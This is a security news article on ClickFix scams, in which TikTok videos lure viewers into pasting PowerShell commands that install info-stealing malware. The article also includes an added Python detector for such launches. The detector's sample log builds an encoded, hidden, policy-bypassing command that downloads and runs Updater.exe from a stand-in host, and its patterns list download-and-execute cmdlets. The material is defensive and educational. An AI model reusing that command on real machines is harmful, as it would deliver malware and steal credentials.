Short videos offering a free Photoshop unlock, a speedier run of Spotify, or a fix for a “slight Windows error” are making the rounds on TikTok. The routine is always the same: open a system tool, paste a code snippet in, and watch the magic. That “magic” is malware. And if a tech tip says you need to paste code, believe me: it’s a scam.
Threat actors are taking advantage of the platform’s reach to distribute information-stealing malware via a social engineering method called ClickFix, security researchers say. The idea is to get victims to infect their own devices, no phishing link necessary.

How the ClickFix scam reels you in with fake fixes
Creators upload a flashy how-to with thousands of likes and chummy directions. They tell you to run PowerShell “as Administrator” and then paste in a single command that’s supposed to enable paid software or increase performance. It looks simple and harmless.
Under the hood, that one-liner downloads and runs a payload, frequently disguised with an innocuous file name such as Updater.exe. In one analyzed case, shared by SANS Institute handler Xavier Mertens, the executable was AuroStealer, a credential-stealing Trojan, and the command also injected shellcode into memory in an attempt to evade detection.
The trick works in part because the victim does much of the work. Having the target copy and paste the command lets the attacker sidestep many phishing defenses, ride on the victim’s own (often elevated) privileges, and use an interpreter the system already trusts to plant the malware.
What the data shows about the rise of ClickFix scams
An investigation led by the SANS Internet Storm Center revealed a surge in short-form videos featuring ClickFix for delivery of info-stealers and remote access tools. Trend Micro has identified TikTok users uploading “life hack” clips that walk viewers through running PowerShell commands that deploy the Vidar and StealC info-stealers.
Microsoft’s recently published Digital Defense Report reinforces how effective this is: the company found ClickFix-style tactics behind a significant share of initial-access incidents, 47% of them, more than classic phishing and password-spray attacks.
Why the surge? Social platforms offer immediate distribution at record scale. Threat actors don’t have to build infrastructure or even maintain booby-trapped sites when the algorithm is shoveling out their pitch directly into millions of timelines.

Why pasting commands is a huge security risk
PowerShell and the like are powerful AF. One command can download a file, alter system settings, turn off protections, and run code in memory. Attackers frequently include flags to hide the console window, bypass the execution policy, and run Base64-encoded payloads that look like gibberish to an untrained eye.
Since the pasted code runs under your account, frequently with Administrator rights, endpoint security tools may treat the activity as legitimate. Some payloads are “fileless,” which makes them harder for traditional antivirus to catch. The end result: stolen passwords, emptied crypto wallets, exfiltrated browser cookies, or a backdoor for later ransomware deployment.
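For defenders, the traits described above (hidden window, execution-policy bypass, encoded command, download-and-run) are exactly what to hunt for in process-creation telemetry. The following is an added example, not code from the article or the researchers it cites: it scans constructed Windows process-creation command lines (such as the CommandLine field of Event ID 4688), decodes any `-EncodedCommand` argument the way PowerShell does (Base64 over UTF-16LE), and scores each line. The switch patterns, field layout, sample lines and the `lure.invalid` host are assumptions.

```python
"""Flag ClickFix-style PowerShell launches in process-creation log lines (added example)."""
import base64
import re
from typing import Optional

# Short and long forms of the switches the article describes.
SUSPICIOUS_SWITCHES = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:p|x|xecutionpolicy)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
}
# Cmdlets and aliases that fetch or execute content; checked in both the raw and decoded command.
DOWNLOAD_RUN = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|invoke-expression|\biex\b|start-process", re.I)
LURE_FILENAME = re.compile(r"updater\.exe", re.I)  # the innocuous name mentioned in the article

def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode -EncodedCommand input: Base64 wrapping a UTF-16LE script. Returns None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_command_line(cmdline: str) -> dict:
    """Return the indicators found in one command line, the decoded payload (if any) and a score."""
    findings = [name for name, rx in SUSPICIOUS_SWITCHES.items() if rx.search(cmdline)]
    match = SUSPICIOUS_SWITCHES["encoded_command"].search(cmdline)
    decoded = decode_encoded_command(match.group(1)) if match else None
    body = cmdline + " " + (decoded or "")  # inspect the plaintext and whatever the encoding hid
    if DOWNLOAD_RUN.search(body):
        findings.append("download_and_run")
    if LURE_FILENAME.search(body):
        findings.append("lure_filename")
    return {"findings": findings, "decoded": decoded, "score": len(findings)}

def scan(lines, threshold: int = 2):
    """Yield (index, analysis) for every line that reaches the alert threshold."""
    return [(i, r) for i, r in ((i, analyze_command_line(l)) for i, l in enumerate(lines)) if r["score"] >= threshold]

def encode_ps(script: str) -> str:
    """Produce the Base64 form PowerShell expects for -EncodedCommand (used only to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample records: one benign admin command, one ClickFix-style lure.
SAMPLE_LOG = [
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    "powershell.exe -w hidden -ep bypass -enc "
    + encode_ps("iwr http://lure.invalid/Updater.exe -OutFile $env:TEMP\\Updater.exe; Start-Process $env:TEMP\\Updater.exe"),
]

if __name__ == "__main__":
    for idx, result in scan(SAMPLE_LOG):
        print(f"line {idx}: score={result['score']} findings={result['findings']}")
```

In a real deployment the same logic belongs in your SIEM or EDR rules, fed by PowerShell script-block logging and process-creation auditing rather than a hand-built list.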
Red flags to spot and safer solutions to avoid malware
Any video that tells you to run commands on your own machine should be met with an air of “What are you playing at?”—especially if it’s suggesting you do so as an Administrator. Watch for these red flags:
- Claims that paid software can be activated “for free.”
- Advice promising to supercharge streaming services or “clean” Windows with one click.
- Instructions to open PowerShell or another system tool and paste in a command.
If you require a software repair, stick to trustworthy sources and protections:
- Use official documentation from the software maker or credible IT resources.
- Download installers only from the developer’s site or trusted app stores.
- Enable Microsoft Defender, SmartScreen, and automatic updates.
- Work from a standard (non-administrator) account whenever possible.
Creators and viewers should also keep in mind that “likes” and comments are not vetting. Engagement can be conjured out of thin air and is not the same as safety. Treat code like medication: never accept it from a stranger on the internet.
If you’ve already pasted the code, here’s what to do
- Run a full-system scan with trustworthy security software and, if available, an offline scan as well. Look for unknown startup items, scheduled tasks, and browser extensions, and remove anything you don’t recognize.
- Assume credential theft. From a clean device, change the passwords for your email, financial and cloud accounts and turn on multifactor authentication. If an info-stealer is suspected, rotate every browser-saved password and sign out of all active sessions.
- If your work involves sensitive data or the system behaves erratically, back up files and do a clean reinstall. If you’re in the app, report the video and let impacted contacts or your workplace IT team know to help prevent potential lateral movement.
The bottom line is simple. A real tip never makes you paste a black-magic one-liner. If you are told to open PowerShell and run code from a TikTok how-to, close the app and keep your system—and you—out of a criminal’s hands.